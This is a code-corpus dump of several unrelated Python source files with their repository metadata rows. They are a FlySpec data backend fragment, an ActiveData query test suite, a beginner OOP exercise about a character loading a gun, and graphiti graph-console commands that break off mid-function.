d = [angles[:inflectionpoints[1]]]
for l in vars_:
d.append(l[0:inflectionpoints[1]:])
yield self._array_multi_sort(*tuple(d))
i = 1
while i < len(inflectionpoints) - 1:
if inflectionpoints[i + 1] - inflectionpoints[i] < 2:
inflectionpoints[i + 1] = inflectionpoints[i]
i += 1
continue
d = [angles[inflectionpoints[i]: inflectionpoints[i + 1]]]
for l in vars_:
d.append(l[inflectionpoints[i]: inflectionpoints[i + 1]])
i += 1
yield self._array_multi_sort(*tuple(d))
# the final point is not an inflection point so now we need to
# return the final scan
d = [angles[inflectionpoints[i]:]]
for l in vars_:
d.append(l[inflectionpoints[i]:])
yield self._array_multi_sort(*tuple(d))
def close(self, filename):
raise Exception('Close is undefined for the FlySpec backend')
def get_item(self, path):
_e = path.split('/')
id = _e[1]
name = _e[2]
ref_o = ResourceIdentifier(id).get_referred_object()
return ref_o.__dict__[name]
def set_item(self, path, value):
_e = path.split('/')
id = _e[1]
name = _e[2]
ref_o = ResourceIdentifier(id).get_referred_object()
ref_o.__dict__[name] = value
def create_item(self, path, value):
pass
def new(self, filename=None):
self._root = FlySpecPlugin()
@staticmethod
def get_format():
return 'flyspec'
if __name__ == '__main__':
import doctest
doctest.testmod()
| gpl-3.0 | 7,344,202,771,692,823,000 | 38.42654 | 81 | 0.538406 | false |
maggienj/ActiveData | tests/test_jx/test_set_ops.py | 1 | 34963 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_math import Math
from unittest import skipIf
from jx_python.query import DEFAULT_LIMIT, MAX_LIMIT
from tests.test_jx import BaseTestCase, TEST_TABLE, global_settings, NULL
lots_of_data = wrap([{"a": i} for i in range(30)])
class TestSetOps(BaseTestCase):
def test_star(self):
test = {
"data": [{"a": 1}],
"query": {
"select": "*",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [{"a": 1}]
}
}
self.utils.execute_tests(test)
def test_simplest(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": "a"
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_select_on_missing_field(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "a.b.d"
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{},
{},
{},
{},
{}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b.d"],
"data": [[NULL], [NULL], [NULL], [NULL], [NULL]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"a.b.d": [NULL, NULL, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_on_shallow_missing_field(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "d"
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{},
{},
{},
{},
{}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["d"],
"data": [[NULL], [NULL], [NULL], [NULL], [NULL]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"d": [NULL, NULL, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_single_deep_select(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "a.b.c",
"sort": "a.b.c" # SO THE CUBE COMPARISON WILL PASS
},
"expecting_list": {
"meta": {"format": "list"},
"data": [1, 2, 3, 4, 5]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b.c"],
"data": [[1], [2], [3], [4], [5]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"a.b.c": [1, 2, 3, 4, 5]
}
}
}
self.utils.execute_tests(test)
def test_single_select_alpha(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": "a"
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_single_rename(self):
test = {
"name": "rename singleton alpha",
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"}
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["value"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"value": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_single_no_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a": "b"}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["."],
"data": [[{"a": "b"}]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
".": [{"a": "b"}]
}
}
}
self.utils.execute_tests(test)
def test_id_select(self):
"""
ALWAYS GOOD TO HAVE AN ID, CALL IT "_id"
"""
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "_id",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"_id": Math.is_hex}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["_id"],
"data": [[Math.is_hex]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"_id": [Math.is_hex]
}
}
}
self.utils.execute_tests(test)
def test_id_value_select(self):
"""
ALWAYS GOOD TO HAVE AN ID, CALL IT "_id"
"""
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "_id",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
Math.is_hex
]
}
}
self.utils.execute_tests(test)
def test_single_star_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "*",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a": "b"}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_dot_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"select": {"name": "value", "value": "."},
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [{"a": "b"}]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["value"],
"data": [[{"a": "b"}]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"value": [{"a": "b"}]
}
}
}
self.utils.execute_tests(test)
@skipIf(global_settings.use == "elasticsearch", "ES only accepts objects, not values")
def test_list_of_values(self):
test = {
"data": ["a", "b"],
"query": {
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
"a", "b"
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["."],
"data": [["a"], ["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
".": ["a", "b"]
}
}
}
self.utils.execute_tests(test)
def test_select_all_from_list_of_objects(self):
test = {
"data": [
{"a": "b"},
{"a": "d"}
],
"query": {
"from": TEST_TABLE,
"select": "*"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a": "b"},
{"a": "d"}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
["b"],
["d"]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
"a": ["b", "d"]
}
}
}
self.utils.execute_tests(test)
@skipIf(True, "Too complicated")
def test_select_into_children(self):
test = {
"name": "select into children to table",
"metadata": {
"properties": {
"x": {"type": "integer"},
"a": {
"type": "nested",
"properties": {
"y": {
"type": "string"
},
"b": {
"type": "nested",
"properties": {
"c": {"type": "integer"},
"1": {"type": "integer"}
}
},
"z": {
"type": "string"
}
}
}
}
},
"data": [
{"x": 5},
{
"a": [
{
"b": {"c": 13},
"y": "m"
},
{
"b": [
{"c": 17, "1": 27},
{"c": 19}
],
"y": "q"
},
{
"y": "r"
}
],
"x": 3
},
{
"a": {"b": {"c": 23}},
"x": 7
},
{
"a": {"b": [
{"c": 29, "1": 31},
{"c": 37, "1": 41},
{"1": 47},
{"c": 53, "1": 59}
]},
"x": 11
}
],
"query": {
"from": TEST_TABLE + ".a.b",
"select": ["...x", "c"]
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"x": 5, "c": NULL},
{"x": 3, "c": 13},
{"x": 3, "c": 17},
{"x": 3, "c": 19},
{"x": 7, "c": 23},
{"x": 11, "c": 29},
{"x": 11, "c": 37},
{"x": 11, "c": NULL},
{"x": 11, "c": 53}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["x", "c"],
"data": [
[5, NULL],
[3, 13],
[3, 17],
[3, 19],
[7, 23],
[11, 29],
[11, 37],
[11, NULL],
[11, 53]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "index",
"domain": {"type": "rownum", "min": 0, "max": 9, "interval": 1}
}
],
"data": {
"x": [5, 3, 3, 3, 7, 11, 11, 11, 11],
"c": [NULL, 13, 17, 19, 23, 29, 37, NULL, 53]
}
}
}
self.utils.execute_tests(test)
@skipIf(global_settings.use=="sqlite", "no need for limit when using own resources")
def test_max_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": 1000000000
}
})
self.utils.fill_container(test)
result = self.utils.execute_query(test.query)
self.assertEqual(result.meta.es_query.size, MAX_LIMIT)
def test_default_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
},
})
self.utils.fill_container(test)
test.query.format = "list"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), DEFAULT_LIMIT)
test.query.format = "table"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), DEFAULT_LIMIT)
test.query.format = "cube"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data.value), DEFAULT_LIMIT)
def test_specific_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": 5
},
})
self.utils.fill_container(test)
test.query.format = "list"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), 5)
test.query.format = "table"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), 5)
test.query.format = "cube"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data.value), 5)
def test_negative_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": -1
},
})
self.utils.fill_container(test)
test.query.format = "list"
self.assertRaises(Exception, self.utils.execute_query, test.query)
def test_select_w_star(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}, "d": 7},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}}
],
"query": {
"from": TEST_TABLE,
"select": "*",
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a.b": 0, "a.c": 0, "d": 7},
{"a.b": 0, "a.c": 1},
{"a.b": 1, "a.c": 0},
{"a.b": 1, "a.c": 1}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.c", "d"],
"data": [
[0, 0, 7],
[0, 1, NULL],
[1, 0, NULL],
[1, 1, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": [0, 0, 1, 1],
"a.c": [0, 1, 0, 1],
"d": [7, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_w_deep_star(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}},
],
"query": {
"from": TEST_TABLE,
"select": "a.*",
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a.b": 0, "a.c": 0},
{"a.b": 0, "a.c": 1},
{"a.b": 1, "a.c": 0},
{"a.b": 1, "a.c": 1}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.c"],
"data": [
[0, 0],
[0, 1],
[1, 0],
[1, 1]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": [0, 0, 1, 1],
"a.c": [0, 1, 0, 1]
}
}
}
self.utils.execute_tests(test)
def test_select_expression(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}},
],
"query": {
"from": TEST_TABLE,
"select": [
{"name": "sum", "value": {"add": ["a.b", "a.c"]}},
{"name": "sub", "value": {"sub": ["a.b", "a.c"]}}
],
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"sum": 0, "sub": 0},
{"sum": 1, "sub": -1},
{"sum": 1, "sub": 1},
{"sum": 2, "sub": 0}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["sum", "sub"],
"data": [[0, 0], [1, -1], [1, 1], [2, 0]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"sum": [0, 1, 1, 2],
"sub": [0, -1, 1, 0]
}
}
}
self.utils.execute_tests(test)
def test_select_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["a"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a": {"b": "x", "v": 2}},
{"a": {"b": "x", "v": 5}},
{"a": {"b": "x", "v": 7}},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
[{"b": "x", "v": 2}],
[{"b": "x", "v": 5}],
[{"b": "x", "v": 7}],
[{}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
}
}
}
self.utils.execute_tests(test)
def test_select_leaves(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["a.*"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a.b": "x", "a.v": 2},
{"a.b": "x", "a.v": 5},
{"a.b": "x", "a.v": 7},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.v"],
"data": [
["x", 2],
["x", 5],
["x", 7],
[NULL, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": ["x", "x", "x", NULL],
"a.v": [2, 5, 7, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_value_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": "a",
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
[{"b": "x", "v": 2}],
[{"b": "x", "v": 5}],
[{"b": "x", "v": 7}],
[{}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
}
}
}
self.utils.execute_tests(test)
def test_select2_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["o", "a"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["o", "a"],
"data": [
[3, {"b": "x", "v": 2}],
[1, {"b": "x", "v": 5}],
[2, {"b": "x", "v": 7}],
[4, {}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
],
"o": [3, 1, 2, 4]
}
}
}
self.utils.execute_tests(test)
def test_select3_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["o", "a.*"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"o": 3, "a.b": "x", "a.v": 2},
{"o": 1, "a.b": "x", "a.v": 5},
{"o": 2, "a.b": "x", "a.v": 7},
{"o": 4}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["o", "a.b", "a.v"],
"data": [
[3, "x", 2],
[1, "x", 5],
[2, "x", 7],
[4, NULL, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": ["x", "x", "x", NULL],
"a.v": [2, 5, 7, NULL],
"o": [3, 1, 2, 4]
}
}
}
self.utils.execute_tests(test)
def test_select_nested_column(self):
test = {
"data": [
{"_a": [{"b": 1, "c": 1}, {"b": 2, "c": 1}]},
{"_a": [{"b": 1, "c": 2}, {"b": 2, "c": 2}]}
],
"query": {
"from": TEST_TABLE,
"select": "_a"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
[{"b": 1, "c": 1}, {"b": 2, "c": 1}],
[{"b": 1, "c": 2}, {"b": 2, "c": 2}]
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["_a"],
"data": [
[[{"b": 1, "c": 1}, {"b": 2, "c": 1}]],
[[{"b": 1, "c": 2}, {"b": 2, "c": 2}]]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
"_a": [
[{"b": 1, "c": 1}, {"b": 2, "c": 1}],
[{"b": 1, "c": 2}, {"b": 2, "c": 2}]
]
}
}
}
self.utils.execute_tests(test)
| mpl-2.0 | -3,831,913,277,298,706,400 | 29.995567 | 90 | 0.263736 | false |
jameswatt2008/jameswatt2008.github.io | python/Python基础/截图和代码/加强/老王开枪/老王开枪-7-创建敌人.py | 1 | 2720 | class Person(object):
"""人的类"""
def __init__(self, name):
super(Person, self).__init__()
self.name = name
self.gun = None#用来保存枪对象的引用
self.hp = 100
def anzhuang_zidan(self, dan_jia_temp, zi_dan_temp):
"""把子弹装到弹夹中"""
#弹夹.保存子弹(子弹)
dan_jia_temp.baocun_zidan(zi_dan_temp)
def anzhuang_danjia(self, gun_temp, dan_jia_temp):
"""把弹夹安装到枪中"""
#枪.保存弹夹(弹夹)
gun_temp.baocun_danjia(dan_jia_temp)
def naqiang(self, gun_temp):
"""拿起一把枪"""
self.gun = gun_temp
def __str__(self):
if self.gun:
return "%s的血量为:%d, 他有枪 %s"%(self.name, self.hp, self.gun)
else:
return "%s的血量为%d, 他没有枪"%(self.name, self.hp)
class Gun(object):
"""枪类"""
def __init__(self, name):
super(Gun, self).__init__()
self.name = name#用来记录枪的类型
self.danjia = None#用来记录弹夹对象的引用
def baocun_danjia(self, dan_jia_temp):
"""用一个属性来保存这个弹夹对象的引用"""
self.danjia = dan_jia_temp
def __str__(self):
if self.danjia:
return "枪的信息为:%s, %s"%(self.name, self.danjia)
else:
return "枪的信息为:%s,这把枪中没有弹夹"%(self.name)
class Danjia(object):
"""弹夹类"""
def __init__(self, max_num):
super(Danjia, self).__init__()
self.max_num = max_num#用来记录弹夹的最大容量
self.zidan_list = []#用来记录所有的子弹的引用
def baocun_zidan(self, zi_dan_temp):
"""将这颗子弹保存"""
self.zidan_list.append(zi_dan_temp)
def __str__(self):
return "弹夹的信息为:%d/%d"%(len(self.zidan_list), self.max_num)
class Zidan(object):
"""子弹类"""
def __init__(self, sha_shang_li):
super(Zidan, self).__init__()
self.sha_shang_li = sha_shang_li#这颗子弹的威力
def main():
"""用来控制整个程序的流程"""
#1. 创建老王对象
laowang = Person("老王")
#2. 创建一个枪对象
ak47 = Gun("AK47")
#3. 创建一个弹夹对象
dan_jia = Danjia(20)
#4. 创建一些子弹
for i in range(15):
zi_dan = Zidan(10)
#5. 老王把子弹安装到弹夹中
#老王.安装子弹到弹夹中(弹夹,子弹)
laowang.anzhuang_zidan(dan_jia, zi_dan)
#6. 老王把弹夹安装到枪中
#老王.安装弹夹到枪中(枪,弹夹)
laowang.anzhuang_danjia(ak47, dan_jia)
#test:测试弹夹的信息
#print(dan_jia)
#test:测试枪的信息
#print(ak47)
#7. 老王拿枪
#老王.拿枪(枪)
laowang.naqiang(ak47)
#test:测试老王对象
print(laowang)
#8. 创建一个敌人
gebi_laosong = Person("隔壁老宋")
print(gebi_laosong)
#9. 老王开枪打敌人
if __name__ == '__main__':
main() | gpl-2.0 | 8,752,744,205,176,716,000 | 17.552632 | 60 | 0.62772 | false |
ThibaultReuille/graphiti | Scripts/console/edition.py | 1 | 5823 | import script
from script import *
class Info(script.Script):
def run(self, args):
self.console.log("{0} nodes, {1} edges.".format(og.count_nodes(), og.count_edges()))
class Load(script.Script):
def run(self, args):
if len(args) < 2:
self.console.log("Usage: {0} <filename>".format(args[0]))
return
std.load_json(" ".join(args[1:]))
class Save(script.Script):
def run(self, args):
if len(args) != 2:
self.console.log("Usage: {0} <filename>".format(args[0]))
return
if os.path.isfile(args[1]):
self.console.log("Error: File already exists!")
return
std.save_json(args[1])
self.console.log("File saved in '{0}'.".format(args[1]))
class Screenshot(script.Script):
def run(self, args):
if len(args) != 2 and len(args) != 3:
self.console.log("Usage: {0} <filename> [<factor>]".format(args[0]))
return
if os.path.isfile(args[1]):
self.console.log("Error: File {0} already exists!".format(args[1]))
return
filename = args[1]
try:
factor = float(args[2])
except:
factor = 1.0
if not filename.lower().endswith('.tga'):
self.console.log("Extension not recognized, needs to be TGA")
return
og.screenshot(filename, factor)
self.console.log("Screenshot with factor {0} saved in '{1}'.".format(factor, filename))
class Clear(script.Script):
def clear_graph(self):
for id in og.get_node_ids():
og.remove_node(id)
def clear_colors(self):
og.set_attribute("og:space:edgemode", "string", "node_color")
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:color", "vec4", "1.0 1.0 1.0 1.0")
def clear_icons(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:icon", "string", "shapes/disk")
def clear_activity(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:activity", "float", "0.0")
for e in og.get_edge_ids():
og.set_edge_attribute(e, "og:space:activity", "float", "0.0")
def clear_lod(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:lod", "float", "1.0")
for e in og.get_edge_ids():
og.set_edge_attribute(e, "og:space:lod", "float", "1.0")
def run(self, args):
if len(args) == 2 and args[1] == "graph":
self.clear_graph()
elif len(args) == 2 and args[1] == "colors":
self.clear_colors()
elif len(args) == 2 and args[1] == "icons":
self.clear_icons()
elif len(args) == 2 and args[1] == "activity":
self.clear_activity()
elif len(args) == 2 and args[1] == "lod":
self.clear_lod()
else:
self.console.log("Usage: {0} [graph|colors|icons|activity|lod]".format(args[0]))
class Set(script.Script):
def __init__(self, console):
super(Set, self).__init__(console)
def run(self, args):
if len(args) < 3:
self.console.log("Usage: {0} <type> <name> <value>".format(args[0]))
return
for key in self.console.query.keys():
entity_type = key[:-1] # TODO : Hack!! find a better way to do this. This removes the ending 's'
for entity_id in self.console.query[key]:
self.console.api.set_attribute(entity_type, entity_id, args[2], args[1], " ".join(args[3:]))
class Get(script.Script):
def __init__(self, console):
super(Get, self).__init__(console)
def run(self, args):
if len(args) < 2:
self.console.log("Usage: {0} <name>".format(args[0]))
return
for key in self.console.query.keys():
entity_type = key[:-1] # TODO : Hack!! find a better way to do this. This removes the ending 's'
result = dict()
for entity_id in self.console.query[key]:
result[entity_id] = self.console.api.get_attribute(entity_type, entity_id, args[1])
self.console.log("{0}: {1}".format(key, json.dumps(result)))
class Remove(script.Script):
def __init__(self, console):
super(Remove, self).__init__(console)
def run(self, args):
if 'edges' in self.console.query:
[ og.remove_edge(eid) for eid in self.console.query['edges'] ]
if 'nodes' in self.console.query:
[ og.remove_node(nid) for nid in self.console.query['nodes'] ]
class Map(script.Script):
def __init__(self, console):
super(Map, self).__init__(console)
def attr_convert(self, src_type, src_value, dst_type, options):
if src_type != dst_type:
raise Exception("Mapping from {0} to {1} not supported!".format(src_type, dst_type))
if dst_type == "vec2":
return std.vec2_to_str(src_value)
elif dst_type == "vec3":
return std.vec3_to_str(value)
elif dst_type == "vec4":
return std.vec4_to_str(value)
else:
if len(options) == 2 and options[0] == "--format":
value = options[1].format(src_value)
return value
else:
return "{0}".format(src_value)
def lambda_map(self, element_type, element_id, src_type, src_name, dst_type, dst_name, options = None):
if element_type == "node":
source = og.get_node_attribute(element_id, src_name)
target = self.attr_convert(src_type, source, dst_type, options)
self.console.log("og.set_node_attribute({0}, {1}, {2}, {3})".format(element_id, dst_name, dst_type, target))
og.set_node_attribute(element_id, dst_name, dst_type, target)
elif element_type == "edge":
source = og.get_edge_attribute(element_id, src_name)
target = self.attr_convert(src_type, source, dst_type, options)
